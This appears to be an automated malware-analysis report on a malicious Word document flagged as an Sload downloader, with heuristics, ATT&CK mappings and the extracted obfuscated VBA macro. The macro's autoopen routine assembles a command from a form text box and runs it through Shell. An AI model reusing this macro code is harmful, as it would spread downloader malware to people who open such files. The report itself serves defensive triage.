Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine that calls the Shell() function. This function is used to execute external commands, specifically referencing cmd.exe and powershell.exe. The presence of these commands suggests the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786421-0' further supports this downloader functionality.
Heuristics (10)

- ClamAV: Doc.Downloader.Sload-6786421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6786421-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Set vsEtjZWGihjNAw = szBpiOwJhoploCXLYBqdokE Vbjmq = Array(FOJSrI, rIEHXK, GnwhVHd, Interaction.Shell(PZQhPpja, wEdGSVj), zVWtTwUn) Select Case LWYwskcctcUfMThhaIEjdGO`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() XGIXkjql`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12074 bytes |

SHA-256: e9bc705fa5cdd94efeaa9d0271cce1018cf1685dc38c763d03084042ac75bf12

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 321 of 370 identifiers look randomly generated (e.g. 'hLlJioKnbuFiiAEaHJtNEkhE') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kFGnNiu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
XGIXkjql
End Sub
Attribute VB_Name = "NJsijRPItM"
Function XGIXkjql()
On Error Resume Next
Select Case jENiIYSoZStofnwvwuDP
Case 295839247
VZwLlnSXcJuiHwAnWAFiw = cvCcJqvzABjvjnhzmiWCp
uAjzuJXCKOmkwBIJdcbdI = Log(uLOMFZNaHvusBCwLvmbwrVI)
rjodBuaLbAFUihDwokGqqEzG = 87755666
jpCKBZDQVZlkZNUiQ = wbcNicJHOSImhh
Case 105708589
OlJQzjRSLiNEKtVHnwKlp = 121366414
ZBuLkIjrDUqzjZA = Log(QKKBDOEwUwBwjX)
tvijPEUjKcnJjUtminwt = 176824770
QDLwzqoGkIjpwDFpkzvi = Log(ZQFUbbKTLndDPf)
End Select
Set YSGirDridtYqjsCwwwi = mFbWPinZUDmhYiRSqRmwhlb
Select Case aqWYRTEcPRXLFqslniN
Case 130445054
YGTLjDXsTvbpPlnpBGqdnoXH = YDJfIsULdBjCNhQhkwWv
pFEvlbXqJjjMiLANNL = Log(HdmjEmoZZwCsBM)
iwEjWRzVUSAqiVQ = 130250399
lTosDVAJzBwtGrhAcd = IiolJHRQDvJDJc
Case 210567273
iYNfcEZYPzbOaSq = 15238139
OKswiilmFwNnwpRakzcOwZE = Log(QVKfCplFHKuRnK)
tcsXIMlRKKoqTO = 262685026
oGojMTFjPLIfnuzmazilFCw = Log(fEAVOzRqTQGLwinaXIHzEFi)
End Select
Set KBQUjColKwBISjVPt = MWooovLHOwvwnZalL
Select Case wbGCZhObBTLTbzYjzzEdno
Case 276098678
kMCCdCcvjMcICfjzv = dhHKZNsAahrGCKloRNi
wwqQnPWPiRNEiOKI = Log(ZmpJdbvDZKSXNNWV)
airqXKqcWITnYnzdiraoC = 140095882
uMNEErREqizojQTCcz = HSbQBWSuiVwjjFHwiJFlk
Case 33703929
cEYwTMLpzpVOET = 314697569
imziiuBTjYTosWNw = Log(OzLcYwhWfwrKqC)
izXznWWiCEPusXzbbZMq = 131600269
jKnQLCwKIsVqFvzOJfrQJ = Log(IDoziXPliMJwNNLXKTm)
End Select
Set vWYCRCbNPjwDaLBjbMUYvXN = jGhlCmUYiQclfmhf
Select Case olijdptBzaPdKIjwM
Case 47894076
bBcZMimQHuOXiKSGUQKqz = QiYLjsmUiGCIXMMMRBqYmHj
jTsBLhBRijluAA = Log(udmLIUamFuHzJz)
FJwUfMzlJAFlZnbRLQz = 319197685
zvbjFjnGDisSHdbvfVpusdL = iAzddviJCjGNXl
Case 172231497
MfFRMTSJzVfvKBCVkYAE = 220545310
cHAjPbXOXuvJiNY = Log(qPipiHQnzAilczlVwDCzRdD)
mkzlzATpzrhkWriVrMjOzmm = 160028376
ZLiKabNLrDtJinz = Log(ookSAzGYhFEtptzwZcao)
End Select
Set iWPUYiolLNZkhIwBGIaFGd = WTWwDukCNKrKRVzbVS
Select Case hwuhTiRnVRKnvwPsZBomSi
Case 301924491
dwwhnPDKGPFXNuXd = ajfGuRfsSraInWwCkEUjjzFN
jjqsiidLnsCODihToVYdCTsH = Log(cqCuOaaSGNloAnMwzz)
wnhVnPvihkzNojXBoaRY = 118772876
wzUwiohLjETNKjvUPiT = thIAzFclYVfbMUrjBrkHzVDs
Case 306398701
YqFTLmFWiOoUwZLwnKY = 290116663
qpMTXtMwXiQFWh = Log(fFKtVqmdvhsLvAisTCZiB)
AnstYKkYOcsaQiAfWKDLQmf = 227003470
zplwDzwjlEWAcRbtX = Log(QTVkAsojOipdNIKca)
End Select
Set wbLitqfdifttcStTOP = NpsIXiUuIqNqArGuvHlafFWO
Const wEdGSVj = 0
Select Case kzTsThwliSGQENbUDjHZz
Case 275966991
uaYujWsnohZihfsskYnOAoCY = MHQFtJkuzZSvnPOp
SjfiuoKrWBKbzFYzfWPc = Log(uXpniGawzIYYVWTtjSTFN)
IZSBUuwHswNzXLprMi = 242947233
ZslCciEFwEwWTXPPUjmfAqQ = LYwHDrFkUTzQoQYlpqK
Case 260338468
qdAwaWfvEujbLr = 30218462
zCFzLCAawaEIAqJfdXVuw = Log(cVapPZNpcZTBroFo)
ndZzzRXvOkDwnVKllZjZWmb = 86738269
wfozzVaojhRZNdD = Log(tBoJqoDJPFPVPU)
End Select
Set CMoBmivPPdJGns = YvjWclmDSJbijtFE
Select Case LNfLmPfVRzECjGRmQPH
Case 318441265
JnEhzZsNQDlkRzpjJXIEZo = uzkJjriwQpnBabinqnHB
TSSHbGGswrOVJJkOQIWiGUud = Log(PEfkSQRnibiSBIkbERzYjRRu)
ZfkSpwXoKMBbHfawhah = 39080851
OzmGBDzFQznlLtlhUtdGirvi = wmWbwqjocKfwLn
Case 311316939
itOOqwmpPNhEzRWEDGE = 112471782
iSGEwjiFiIFifvwjUJA = Log(hLlJioKnbuFiiAEaHJtNEkhE)
WTWYXjwERtShzZIYudn = 23822336
DfqXYKQnvwijhIVoPD = Log(IiMHltKkloJGtAFS)
End Select
Set fAwYjRVwoAPRnkiacvsrXF = OafwmqkfcpjIPFmcNqKz
Select Case uGEuYHqrcOLcmhaETlQ
Case 282150924
YcvjuXNruXAArktHNL = QpQswrnhnLOGDzIV
JKikcAirKbuzhwGaFadI = Log(wsGqafjQwCjOPwChbnphB)
PtjFPIjwXfNuMRXuCUCaOZ = 75265258
RzDsdmnahIdNGUQXkzfDB = mlKhlUfaZphAoREnVl
Case 288103122
MDoJohEiqQuHhzKSiwASvH = 231526735
fFjwTwctMOHjwAtEQAkJva = Log(qGmFZkZrFTAdiAFLuo)
vTqbVhCwCuWasF = 251495373
rjqDInWBPwWKDLoqUvizAf = Log(YWoXzjtIXwKNiDkrI)
End Select
Set oLYKssqFjFwbmqMPShUQZSVo = OtwKnkDWCLUsNivjrCoLwKUB
Select Case vlFNKKdjnDVjiVoiWzsa
Case 139311483
vSfGQWAwcdzVNEAvzwwrIzV = dFPGqPKcHCpnhDt
iqasjNHjhaCtddk = Log(zYdKGuGMTUNKPNOuFoJRWdYP)
fYQNQwiSrpJZiAokOZOAzUTM = 50300160
pUSbUzOMbVpzCVisXYFUWo = hIDKOAKEEFcJJzQVJL
Case 145508498
SuPWsREzvGmSAzlSQpz = 79765165
QltaMYtHCvJAOCmth = Log(wvNJzTJIKNzFTLJIB)
WwjsLqtKdSmzzZj = 158671046
QDHnaQDOfJwbwq = Log(AdXklDkXPmprWNO)
End Select
Set WvItFuVwfcifjwjfbjw = CwnzjfrBkYjARlajpw
PZQhPpja = kFGnNiu.TextBox1 + aFIYE + DKPqQs + IINZCU + wdOvW + ffqObsia + YzZJqkYP + jiaDmP
Select Case qYPdAFBzOdVMnFmChlKCApDa
Case 218195593
bjvJzlJzPPLjtNilfwb = lZYsoljwwAVpwciREFfjCnq
qwrzYOJFzomBLDVMCN = Log(OtWnRiMhaSrpwi)
BqtlXiqQqHpcFB = 236408788
hokcdTLaOLjimHzoTK = iSQqUXdjfbFHjr
Case 340134372
ANGYhfTXMBIiiIAJ = 310523744
FAQwQEznfwIEArmwwbMmUzwt = Log(SPzzXbvMjlzuCzCYtzVO)
BQrmKZzIfGBWUzo = 1393311
IWMsUFnCvdKNazdiWRzHLN = Log(wDBfzXhANYDrwB)
End Select
Set jKDjOvnvFGYrwfpsi = UOoTaqiNdwpWHidGkoEbwGK
Select Case ljNTRqODGmXSflKkEYs
Case 340484786
luVzcUKwCXjUvrfanBiwsn = KOfsbjZkMbmzlrVp
DEDPowjtfJRWKAuzhL = Log(zcjSdmWsJsuiRMMvnkwVQ)
zvWHOCbsBDjmstTmacRFaAka = 342118283
zFGNjpRBdnwVYURR = qCfTTbBJVELVwKvHEEVlnTq
Case 137193759
QjqEDznJJuYUpidEENlGjic = 3035594
UPwfDWMKdCvLESGX = Log(oQWmOarjjGEOKlDp)
ihrdGXMKMbitzvfiUpLdaGp = 30039164
TQHvSRrVNjZjiitKcBwJnkKZ = Log(qwrMQcsmimGEOuKqXlMF)
End Select
Set lHSTwEqvLjFiQc = zJzGjtDvmFNGoSQwwT
Select Case FqWzoTCNZiRsZYrVAP
Case 231481445
qivFWJTwkptXLXvzjwakiKc = hljwRcJlHmhWvRbfzFcjlt
CdupBpzOjFHYkZVfHfHQ = Log(qYCOXvkZhsCoEhUWnHw)
XARntqFiaVEdcIL = 37386486
aitOpwMFjjsAITXLIBpGOVj = FzMoYLwVPiNdCthBFhJKMd
Case 115413548
hSUGVzdEwDJqmY = 214608939
jXldGuIPTnBhMWdchKG = Log(qpzPBJfwkqOjBka)
rnunJFnhzvsbZjJcRZitXV = 187530646
OJicZUjbvpktPTzkCRSFRDZD = Log(mPbCjRWLwYzaKIdPQjkwP)
End Select
Set wczrFDWfLkbvmFEY = YOiRuzKsIopAWoHSa
Select Case aCJtuUWdtfjZzNYRtHLuIQzJ
Case 146791933
GzSufVJECsbNURBDjlwJfoM = saDupKFAXAOZKzALQvL
pjntsFkLKNOSkqCESOOs = Log(bqUDcshlnskchmLnJBkatq)
mwoTzvsCjTrOpSqQ = 82713116
ZWUdpCEqQJMiSt = jiHnZjpvqEJqYWVSkXWTT
Case 270120083
GlPHfipCBzdIjjd = 258067520
kbiZjMjTuqcGvZRrZA = Log(KbJMBBHsuNljHk)
jrKjaZiolrMvGY = 79381543
KicdraOdXYUlFIHUW = Log(qZhqacbnYUoGBTiwbBiHLIc)
End Select
Set MBEzicksYOhmjTHABECu = QWACJhGpPjhwAdYYdFvkwh
Select Case zZjqOrFihwpmWKZChbREcDi
Case 61791753
fFWuLconvqssfEKOu = oizoCvEriVZRvrWYjmjkWTBz
UjJBXGpiHubTrDbqTwS = Log(iuBVHUYfKaUjwNiO)
qGOkiowvEsjItCVjlwZfouC = 226705778
YjZuViUNwdrDdwFE = CcpXQYzzMQIjFvEjaJI
Case 150613863
jNOuzZdfIAUaOr = 171173099
mHIawJNMiqhnXDmwiYTOacT = Log(VSEQnIrEinnCAvEZABQGrqIF)
YsqYLSJoIFiFwZVz = 193069074
kPkwmTtOZLMHiJw = Log(PQAfSUiNrqZUDc)
End Select
Set HOhYpdbFWiztzbBaUGuJEwzp = lWEvuYKwQFtzlIYnK
Select Case jiKzdGCdFNzCuMDlEAF
Case 249932939
BQREoHfvzCjwNwZzWhEHsz = wFMaESiUTHkiOtvpzWhGLSD
OdoiTAizEVUzcjbdVhNrd = Log(LDbsFkKqjiBiMaivB)
cmdsYvNSvEkdFLEwS = 237815393
bvtmNmqzzUAwZju = qmTffimpGGFYqaNIu
Case 269341881
XizPFhwQzvFKzKwOLzE = 182015728
IEjHjSHWHsEkGXjqXNwjOpuA = Log(INtMCIqNdOiTHZPrtpCBaqn)
XomGuiSKfMXENKFjO = 155135231
ICXPnipVzrzURadoNWjS = Log(vTnuBLdikSnCNiNAYwXENST)
End Select
Set rFdjVrNiFiNijUlXMmPY = SEvQooXMNhcAHDvh
Select Case AGuXFmGdRKChIzZzMwon
Case 189874031
RqzIXcaIpHoSFDzLdc = THCIcQcoLVzfvD
pDYzOdDJUvsptWwBTMmJ = Log(OiXruoOmrbtPbNwnf)
XPwhMjbjRMUiTItQ = 175234075
AFTpoWcTzZSICNnwPt = jWoQLWCSNIkWKnbma
Case 302428230
bbFsjBRJJGrUszAuwMoIS = 251124632
PLPDHVbbNFhSobd = Log(PtMsLWorWJtdal)
PpWphTzKoifdPLhLSVHYO = 40257755
ttXXhzbzBbTScSlvkSjYJjs = Log(jpzaISMXIvdwJwQMMki)
End Select
Set vsEtjZWGihjNAw = szBpiOwJhoploCXLYBqdokE
Vbjmq = Array(FOJSrI, rIEHXK, GnwhVHd, Interaction.Shell(PZQhPpja, wEdGSVj), zVWtTwUn)
Select Case LWYwskcctcUfMThhaIEjdGO
Case 194680047
DRcHjQVfdqGNPNYbhfG = FNRsujhWXRFIvVpSzVK
wAicbTKujFwbIEVp = Log(kNAjwHMlzSuXGbMUvaFioQaY)
qSUizqzASPHKczsVrdBQWZ = 193767480
GNiQLKTmbwHpsGzbvXnME = TaMIzmZIQQpkYmMi
Case 268726677
vVjfrCdkfaVwmRf = 319553437
DDCNhNTfrAHiKOMifQianiK = Log(MGwmSiXFbsJimuOIPAAC)
CULIPHBwVGVtXBaOjN = 84784112
CHSFhwkBaLmhHJKlniCW = Log(IFmolOsotjnnZTvCGa)
End Select
Set WzVKUnmOrobCKqGtBf = wirNjcztipOjjDjAW
Select Case uTsNiaIHhHEuHWPwwNpr
Case 19372808
PXjqFXTlMtCckUDY = iPXqwpJwWBCpuRcdjDVds
lovuLrfmvvXiGcfWQi = Log(riVQwSbazDQhuqNdiuE)
STkGGRQLAzJmmEAmQXzc = 232357975
fiiNcntwwcMEHYwOK = BQaBtdvqqaNKvbuAnBbs
Case 268927427
RBAhahwboBNUaSrdoASm = 322847630
llhlKGkwnRqYzZBMDO = Log(OlLzaAcJKNaaCfwPPAoXqqs)
wiCTSccwEsihaoGki = 327223111
jMqnsAJmMPqDXtwAvwI = Log(hldWKzRoatEpsPICFrJTIqQ)
End Select
Set NoKndnKmZGtwiUcviVLSK = LHkuuEppiqUvIW
Select Case ZtYhBIjSoIYjDoYbmwz
Case 272181507
HtDacTwJsRJCGQU = NUnizjDSsvhMWazJFSSAUG
olIvqPdwXElYdJKMapl = Log(hmmnRUAwowTVHvztokMCO)
KIkBTzvFrKiZrCwViWPjIYkQ = 118139832
KQYpdiTiciCQAABiHJmhE = vSGpnhplXUjlpihBjAGIZUTN
Case 149013514
iaQbdkdNVFjnultqG = 222367182
OLXAFcmbvXbzsTZDPUwr = Log(HbIcStFUPjNlhHDHZLwrIipu)
qUVhdVKqhGjPYnj = 216034026
jnNOLLVwpJzzrZm = Log(WcYjmlOCuzBTrAYP)
End Select
Set BBCjriJzlnLMrphz = CKKzUuYLTLJCEp
Select Case kODwPzfjawbbrKIpMJ
Case 34761921
DjBijjuzOzuLwWknsjNzubwH = JHdAHzJtZRDMUSfEiUdBQf
aUwjvFCciuwXcRzHzl = Log(XFjaYNiuMGUGWdmDf)
TNnWoVSXvDnlNfPz = 51383701
ttXSNLpVNnZtpOSwi = iAQLIASfGbsprYWXJlm
Case 5173724
chSHiwBNZSQBrS = 48425944
hlXAiEOdYwAXREjKdXCTzEdC = Log(RhIcozFOZbzPASYSp)
hziwVmGXTQoAdIUkQXGAk = 321977303
IschvdFiAIUvFlULWWQjpaY = Log(ruQBBMozlCVDsELuNmnsIMOw)
End Select
Set LjiTQFiTiqAMEdnTVKDPRTRL = SDnjpijSFpdKfUwnkO
Select Case CqjPqYibJQGKGiPmT
Case 333015729
MBKKJTZAIzOJHBHQJRRI = zaqsGLSihbzwrI
rfWwQXVbvGzJwOFUC = Log(cMbTRDIHSbYOLPttYiuVrd)
wvlGBTUbGwIPvnYNToJF = 305898656
jvjQFpbZjzwjcX = wGozzRRCAzFAQbhiXjvP
Case 274938944
lOfAjQJRLLAhWhVIul = 92889951
jSzoKwzQazhIqZUZSwlBtil = Log(zjFzNPoJBwoTOqqiRsqMdsq)
NvpwAMzAjFoatzDLLYGtkBKc = 56290762
kBsZQHtHmRasIo = Log(nmIBPpRofAFlwMLkNnwcwIGp)
End Select
Set hlMlkSPRwwOCasNSMNYKW = uahNFKMzfjTUhDECuipTAPzi
End Function